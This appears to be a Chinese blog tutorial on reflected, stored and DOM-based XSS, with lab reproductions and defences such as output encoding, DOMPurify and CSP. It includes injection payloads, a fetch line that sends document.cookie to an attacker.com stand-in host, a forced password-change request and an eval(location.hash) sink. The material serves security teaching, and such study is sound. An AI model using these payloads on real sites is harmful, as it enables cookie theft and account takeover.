当前位置: 首页 > article >正文

XSS攻防实战笔记:从反射、存储到DOM型的漏洞原理与靶场复现

1. XSS漏洞初探当输入框变成攻击入口第一次接触XSS漏洞时我盯着那个普通的搜索框看了很久——谁能想到这个每天都要打交道的网页元素竟然能成为黑客的攻击入口记得当时我在一个测试网站上随手输入scriptalert(嘿你被XSS了)/script按下回车键的瞬间那个弹出的警告框让我后背一凉。这就是跨站脚本攻击Cross-Site Scripting最直观的体现攻击者通过注入恶意脚本让受害者的浏览器执行不该执行的代码。XSS之所以危险是因为它利用了网站对用户输入的过度信任。现代网站需要与用户频繁交互搜索框、评论区、个人资料编辑这些地方都需要接收用户输入并展示出来。如果开发者没有做好防护攻击者就能在这些输入-输出的环节中插入恶意代码。最常见的三类XSS是反射型、存储型和DOM型它们的攻击路径和危害程度各不相同。举个例子去年某知名论坛的存储型XSS漏洞导致上万用户信息泄露。攻击者在个人简介字段插入恶意脚本每当其他用户查看他的资料时脚本就会悄悄把用户的cookie发送到攻击者服务器。这个案例让我意识到XSS绝不只是弹个警告框那么简单它可能成为大规模数据泄露的入口。2. 反射型XSS钓鱼链接里的陷阱2.1 原理剖析一闪而过的恶意反射型XSS就像网络世界的一次性武器攻击者需要精心构造一个恶意链接诱骗受害者点击。当受害者打开链接时服务器会将恶意脚本反射回浏览器执行。我在本地靶场测试时构造了这样一个URLhttp://vulnerable-site.com/search?qscriptalert(document.cookie)/script当管理员查看搜索日志时他的会话cookie就会通过alert弹窗显示出来。虽然这个例子很简单但实际攻击中攻击者会用更隐蔽的方式窃取数据。反射型XSS有两个关键特点首先恶意脚本不会存储在服务器上而是通过URL参数传递其次需要用户交互点击链接才能触发。这使它成为网络钓鱼的完美搭档。我曾见过攻击者将恶意链接伪装成工资单查询、会议通知等正常邮件诱导企业员工点击。2.2 靶场实战从发现到利用在DVWADamn Vulnerable Web Application靶场中复现反射型XSS特别有教育意义。设置安全级别为low后我在搜索框输入测试payloadimg srcx onerroralert(XSS)页面立即弹窗说明存在漏洞。进阶测试时我会用Burp Suite拦截请求修改参数值插入更复杂的脚本。比如script fetch(http://attacker.com/steal?cookiedocument.cookie) /script这个脚本会悄悄把用户cookie发送到攻击者控制的服务器。防御这类攻击关键在于对所有URL参数进行严格的输出编码。3. 存储型XSS潜伏在数据库里的定时炸弹3.1 持久化攻击的危害如果说反射型XSS是一次性武器那存储型XSS就是埋在网站里的地雷。我在测试某开源论坛系统时发现它的评论区没有过滤HTML标签。于是发布了一条看似普通的评论iframe srcjavascript:alert(XSS)此后每个访问该页面的用户都会触发这个恶意脚本。更可怕的是即使用户注销再登录攻击依然有效因为恶意代码已经永久存储在服务器数据库里。存储型XSS常见于以下场景用户评论/留言系统商品评价区域论坛帖子内容客服聊天记录用户昵称或个人简介去年某电商平台就因商品评价区的存储型XSS漏洞导致攻击者能窃取所有查看商品详情页用户的支付信息。这个案例让我在开发中格外注意所有用户生成内容(UGC)的过滤。3.2 靶场复现从注入到防御在OWASP Juice Shop靶场中我通过以下步骤复现存储型XSS找到商品评价功能点提交包含恶意脚本的评价svg onloadalert(XSS)刷新页面后发现脚本持续执行防御存储型XSS需要多层防护输入过滤移除或转义特殊字符输出编码根据输出上下文(HTML/JS/URL)使用不同编码内容安全策略(CSP)限制脚本执行来源HttpOnly标记防止通过JavaScript访问cookie4. DOM型XSS客户端渲染的暗礁4.1 不经过服务器的攻击DOM型XSS是最容易被忽视的类型因为它完全在客户端发生不经过服务器处理。我在审计某SPA(Single Page Application)网站时发现一个典型案例。网站通过以下方式获取并显示URL中的用户名let username window.location.hash.substr(1); document.getElementById(welcome).innerHTML 欢迎, username;攻击者只需构造这样的URLhttp://victim-site.com#img srcx onerroralert(1)当用户访问时恶意代码就会被执行。这种攻击特别危险因为传统WAF无法检测到恶意payload根本不会发送到服务器。4.2 靶场演练解剖DOM操作在PortSwigger的DOM-XSS靶场中我通过开发者工具逐步调试JavaScript执行流程发现页面使用以下代码处理URL参数let search document.location.search; let params new URLSearchParams(search); let keyword params.get(search); document.write(搜索结果 keyword);构造恶意URLhttp://target.com?searchscriptalert(1)/script观察document.write如何将未转义的内容写入DOM防御DOM型XSS需要避免使用危险的DOM操作方法如innerHTML、document.write对动态内容使用textContent而非innerHTML使用DOMPurify等库净化HTML内容实施严格的CSP策略5. 组合拳攻击XSS的高级利用5.1 突破同源策略单纯的XSS弹窗演示虽然直观但实际攻击往往更复杂。我曾在渗透测试中结合XSS和CSRF漏洞实现了对目标系统的完全控制。攻击流程如下通过存储型XSS注入恶意脚本脚本在受害者浏览器中执行构造CSRF请求利用受害者权限修改账户设置最终获取系统管理员权限这个案例中使用的关键payload如下fetch(/admin/change-password, { method: POST, body: newpassattacker123 });5.2 实际案例分析某次真实渗透测试中我发现目标网站存在DOM型XSS漏洞但常规payload被过滤。通过分析前端代码发现网站使用jQuery的$()方法插入动态内容。于是构造了这样的攻击$(window).on(hashchange, function(){ eval(location.hash.slice(1)); });然后通过URL传递恶意代码http://victim.com#alert(document.cookie)这个案例教会我理解前端框架的工作原理对发现高级XSS漏洞至关重要。6. 防御之道从开发到运维的全方位防护6.1 开发阶段的最佳实践经过多次XSS攻防实战我总结出以下防御方案输入验证// 白名单过滤示例 function sanitize(input) { return input.replace(/[^a-zA-Z0-9-_]/g, ); }上下文感知的输出编码// HTML实体编码 function encodeHTML(str) { return str.replace(//g,amp;) .replace(//g,lt;) .replace(//g,gt;); }安全框架使用前端DOMPurify、sanitize-html后端OWASP ESAPI、Spring Security6.2 运维层面的加固措施除了开发时的防护运维配置也至关重要内容安全策略(CSP)配置示例Content-Security-Policy: default-src self; script-src self https://trusted.cdn.com; img-src *; style-src self unsafe-inline;其他HTTP安全头X-XSS-Protection: 1; modeblock X-Content-Type-Options: nosniff在多次渗透测试中我发现即使应用层防护存在缺陷严格的CSP策略也能有效阻止大多数XSS攻击的成功执行。这提醒我们防御需要多层次、纵深化的策略。

相关文章:

XSS攻防实战笔记:从反射、存储到DOM型的漏洞原理与靶场复现

1. XSS漏洞初探&#xff1a;当输入框变成攻击入口 第一次接触XSS漏洞时&#xff0c;我盯着那个普通的搜索框看了很久——谁能想到这个每天都要打交道的网页元素&#xff0c;竟然能成为黑客的攻击入口&#xff1f;记得当时我在一个测试网站上随手输入<script>alert(嘿&…...

文墨共鸣新手指南:如何构造高质量测试文本以验证‘异曲同工’判别力

文墨共鸣新手指南&#xff1a;如何构造高质量测试文本以验证‘异曲同工’判别力 1. 认识文墨共鸣系统 文墨共鸣是一个将深度学习技术与传统水墨美学相结合的语义相似度分析系统。它基于阿里达摩院开源的StructBERT大模型&#xff0c;专门针对中文语义优化设计。 这个系统的核…...

AIVideo赋能电商带货:自动生成产品介绍视频,节省拍摄剪辑成本

AIVideo赋能电商带货&#xff1a;自动生成产品介绍视频&#xff0c;节省拍摄剪辑成本 1. 电商视频制作的痛点与解决方案 在电商行业&#xff0c;产品介绍视频已经成为提升转化率的关键因素。然而传统视频制作面临三大难题&#xff1a; 成本高昂&#xff1a;专业拍摄团队日薪…...

单链表经典例题:相交链表 你一看就会

力扣的题目链接原题 https://leetcode.cn/problems/intersection-of-two-linked-lists/ 给你两个单链表的头节点 headA 和 headB &#xff0c;请你找出并返回两个单链表相交的起始节点。如果两个链表不存在相交节点&#xff0c;返回 null 。 图示两个链表在节点 c1 开始相交…...

Cosmos-Reason1-7B多场景落地:覆盖机器人、自动驾驶、工业质检等6大领域

Cosmos-Reason1-7B多场景落地&#xff1a;覆盖机器人、自动驾驶、工业质检等6大领域 1. 项目概述 Cosmos-Reason1-7B是NVIDIA推出的7B参数规模的多模态视觉语言模型&#xff0c;专注于物理常识理解和思维链推理能力。作为Cosmos世界基础模型平台的核心组件&#xff0c;它能够…...

我试了试用 SQL查 Linux日志,好用到飞起

最近发现点好玩的工具&#xff0c;迫不及待的想跟大家分享一下。大家平时都怎么查Linux日志呢&#xff1f;像我平时会用tail、head、cat、sed、more、less这些经典系统命令&#xff0c;或者awk这类三方数据过滤工具&#xff0c;配合起来查询效率很高。但在使用过程中有一点让我…...

别再纠结React拖拽库了!2025年实战对比:dnd-kit vs react-dnd vs antd Table

2025年React拖拽库深度选型指南&#xff1a;从垂直列表到复杂交互的全场景决策 在React生态系统中&#xff0c;拖拽功能实现一直是开发者面临的技术选型难题之一。随着2025年React 19的稳定发布和各类库的迭代演进&#xff0c;dnd-kit、react-dnd和antd Table等解决方案各自形成…...

别再为STM32F407+LAN8720以太网通信发愁了,这份CubeMX+FreeRTOS+LWIP的避坑配置指南请收好

STM32F407LAN8720以太网通信实战避坑指南&#xff1a;从CubeMX配置到FreeRTOSLWIP调优 实验室的灯光下&#xff0c;你盯着屏幕上闪烁的Ping请求超时提示&#xff0c;第17次尝试让STM32F407通过LAN8720与主机通信。作为嵌入式开发者&#xff0c;以太网通信本该是基础技能&#x…...

OpenClaw学习总结_II_频道系统_1:WhatsApp集成详解

II. 频道系统 - 1. WhatsApp &#x1f4cd; 课程位置 阶段&#xff1a;II. 频道系统 课序&#xff1a;第 1 课 前置知识&#xff1a;I. 核心架构&#xff08;Gateway/Session/Tools&#xff09; 后续课程&#xff1a;II-2. Telegram&#x1f3af; 本课核心问题&#xff08;你不…...

Java笔记2(修改)

一、Java变量1、定义&#xff1a;变量是程序中最基础的存储单元&#xff0c;运行时值是可以改变的,本质上就是在内衬纸开辟的一块空间使用变量访问这块空间2、数据类型&#xff1a;变量名值public static void main(String[ ] args){int age 20;}System.out.println("age…...

失信被执行人查询小工具 | 在线快速查询入口

&#x1f4cc; 工具介绍 本失信被执行人查询小工具&#xff0c;无需下载 APP、无需注册、无需付费&#xff0c;打开就能用&#xff0c;实时查询全国失信名单、限制消费人员、被执行人信息。 适合&#xff1a; ・合作做生意前查对方信用 ・交友、相亲、招聘背调 ・查自己是否被误…...

【VLM】HopChain视觉语言推理多跳数据合成框架

note 【数据合成方案进展】讲得是多跳视觉语言推理数据合成框架&#xff0c;用于应对视觉语言模型&#xff08;VLMs&#xff09;在长思维链&#xff08;CoT&#xff09;推理中的错误累积以及大多数 RLVR 视觉语言训练数据缺乏全程依赖视觉证据的复杂推理链的问题。工作在《Hop…...

Vibe Coding实战:如何用AI生成你的第一个React天气应用(附完整Prompt模板)

Vibe Coding实战&#xff1a;用AI构建React天气应用的完整指南 从零开始的AI编程体验 去年夏天&#xff0c;我尝试用传统方式开发一个天气应用&#xff0c;花了整整三周时间调试API接口和React组件状态管理。而今年&#xff0c;借助Vibe Coding技术&#xff0c;同样的项目我只用…...

【前端知识】React生态你了解多少?

React生态你了解多少&#xff1f; React 常见生态组件**一、React 生态系统整体结构图示****二、核心生态组件详解 可执行示例****1. React Router&#xff08;路由管理&#xff09;****2. Ant Design&#xff08;UI 组件库&#xff09;****3. Zustand&#xff08;轻量状态管理…...

CSS3文字闪烁效果实战:3种方法让你的网页标题更吸睛(附完整代码)

CSS3文字闪烁效果实战&#xff1a;3种方法让你的网页标题更吸睛 在电商促销页面或活动公告栏中&#xff0c;一个醒目的标题往往能瞬间抓住用户的注意力。文字闪烁效果作为一种经典的视觉设计手法&#xff0c;通过动态变化的光影和色彩&#xff0c;能够有效提升关键信息的传达效…...

避坑指南:Windows搭建Turn服务器常见问题及解决方案

Windows平台Turn服务器部署避坑实战手册 在实时音视频通信领域&#xff0c;Turn服务器扮演着关键的中继角色&#xff0c;特别是在NAT穿透场景中。Windows平台因其广泛的用户基础&#xff0c;成为不少开发团队的首选部署环境。然而&#xff0c;从源码编译到服务配置的每一步都可…...

vxe-table列头合并避坑指南:从基础配置到高级动态调整

vxe-table列头合并实战指南&#xff1a;从基础配置到动态策略优化 在企业级前端开发中&#xff0c;数据表格的展示需求往往超出基础功能范畴。当我们需要将多个逻辑相关的列头合并为一个视觉单元时&#xff0c;vxe-table的merge-header-cells功能便成为解决这一痛点的利器。本文…...

避坑指南:从EXT151安装包解压到QRC成功集成Cadence的全流程复盘

避坑指南&#xff1a;从EXT151安装包解压到QRC成功集成Cadence的全流程复盘 在集成电路设计领域&#xff0c;寄生参数提取是确保芯片性能准确模拟的关键环节。Cadence的QRC工具作为行业标准解决方案&#xff0c;其安装配置过程却常常成为工程师的"拦路虎"。本文将基于…...

AtCoder Beginner Contest 450 复盘

总结这是第一次打Atcode Beginner的网赛&#xff0c;以前一直打codeforce的网赛&#xff0c;总体来说题目比codeforce的难度梯度还是明显&#xff0c;比codeforce的题目相对还是有点难&#xff0c;恐怕是看不懂题目&#xff0c;题目描述和codeforce有比较大的区别&#xff0c;第…...

egoShieldTimeLapse:基于STM32的延时摄影运动控制库

1. 项目概述egoShieldTimeLapse 是专为 uStepper egoShield 硬件平台设计的开源时间 lapse&#xff08;延时摄影&#xff09;控制库&#xff0c;由 ON Development 开发并维护。该库并非通用型电机控制中间件&#xff0c;而是面向特定工业级运动控制场景的垂直解决方案——将高…...

威联通NAS iSCSI实战:如何将NAS硬盘变成电脑的‘第二块硬盘’(附速度测试对比)

威联通NAS iSCSI深度应用指南&#xff1a;解锁专业级存储扩展方案 对于创意工作者和重度数据用户而言&#xff0c;本地存储空间不足是个永恒痛点。想象一下&#xff0c;当你正在处理4K视频项目时&#xff0c;突然弹出"磁盘空间不足"的警告&#xff1b;或是下载了最新…...

YOLO26-Pose端到端部署:告别NMS!人体与工业部件关键点检测实战

做关键点检测的同学肯定都被NMS后处理折腾过&#xff1a;尤其是边缘部署的时候&#xff0c;NMS不仅耗时占比能到30%&#xff0c;不同框架的NMS实现还不一样&#xff0c;很容易出现精度对齐问题&#xff0c;改半天都对不齐训练时的效果。 上个月做消费电子厂的连接器引脚平整度检…...

Gazebo仿真环境下的SLAM建图实战:从模型导入到地图保存全流程

Gazebo仿真环境下的SLAM建图实战&#xff1a;从模型导入到地图保存全流程 在机器人开发领域&#xff0c;仿真环境的重要性不言而喻。Gazebo作为一款功能强大的3D机器人仿真平台&#xff0c;为开发者提供了测试SLAM算法的理想沙盒。本文将带你从零开始&#xff0c;在Gazebo中搭建…...

拉普拉斯反变换避坑指南:当ROC区域遇到部分分式展开时的5个易错点

拉普拉斯反变换避坑指南&#xff1a;当ROC区域遇到部分分式展开时的5个易错点 在信号与系统领域&#xff0c;拉普拉斯反变换是连接复频域与时域的关键桥梁。许多工程师和学生在处理部分分式展开与收敛域&#xff08;ROC&#xff09;的交叉问题时&#xff0c;常因细微疏忽导致结…...

Qwen3-4B-Thinking模型软件测试应用:自动化测试用例与缺陷报告生成

Qwen3-4B-Thinking模型软件测试应用&#xff1a;自动化测试用例与缺陷报告生成 1. 引言&#xff1a;当测试工程师遇上AI助手 想象一下这个场景&#xff1a;产品经理刚刚发来一份长达50页的新功能需求文档&#xff0c;要求在下周完成测试覆盖。你看着密密麻麻的文字&#xff0…...

Git误删急救指南:30秒挽救代码

Git误操作急救手册大纲常见误操作场景分类文件误删或未暂存就撤销修改 提交信息错误或漏提交文件 分支误删或错误合并 远程仓库操作失误&#xff08;如强制推送覆盖历史&#xff09;撤销本地修改的紧急措施恢复工作区未暂存的修改&#xff1a;git checkout -- <file> 撤销…...

【路径规划】在二维和三维空间中实现RRT_算法,根据障碍物位置和尺寸实现的避障功能附matlab代码

✅作者简介&#xff1a;热爱科研的Matlab仿真开发者&#xff0c;擅长毕业设计辅导、数学建模、数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。&#x1f34e; 往期回顾关注个人主页&#xff1a;Matlab科研工作室&#x1f447; 关注我领取海量matlab电子书和…...

MATLAB/Simulink 两相交错并联Buck电路仿真:电压闭环控制之旅

MATLAB/Simulink&#xff0c;两相交错并联Buck&#xff08;降压斩波&#xff09;电路仿真模型&#xff0c;电压闭环控制&#xff0c;仿真电路以及部分波形如图所示&#xff0c;可定制模型。 2022b版本&#xff0c;可转其他版本最近在研究电源管理相关的项目&#xff0c;和大家分…...

在Java中如何理解方法访问修饰符的作用

方法访问修饰符决定了类中方法的可见性和可访问范围&#xff0c;是Java封装特性的重要体现。合理使用访问修饰符不仅能保护数据安全&#xff0c;还能提升代码的可维护性和设计清晰度。理解它们的作用&#xff0c;关键在于掌握每种修饰符的具体访问权限以及在实际开发中的最佳实…...

3.22 OJ

一、题目&#xff1a;8皇后改作者: turbo时间限制: 1s章节: 深度优先搜索问题描述规则同8皇后问题&#xff0c;但是棋盘上每格都有一个数字&#xff0c;要求八皇后所在格子数字之和最大。输入说明一个8*8的棋盘。数据规模和约定棋盘上的数字范围0~99输出说明所能得到的最大数字…...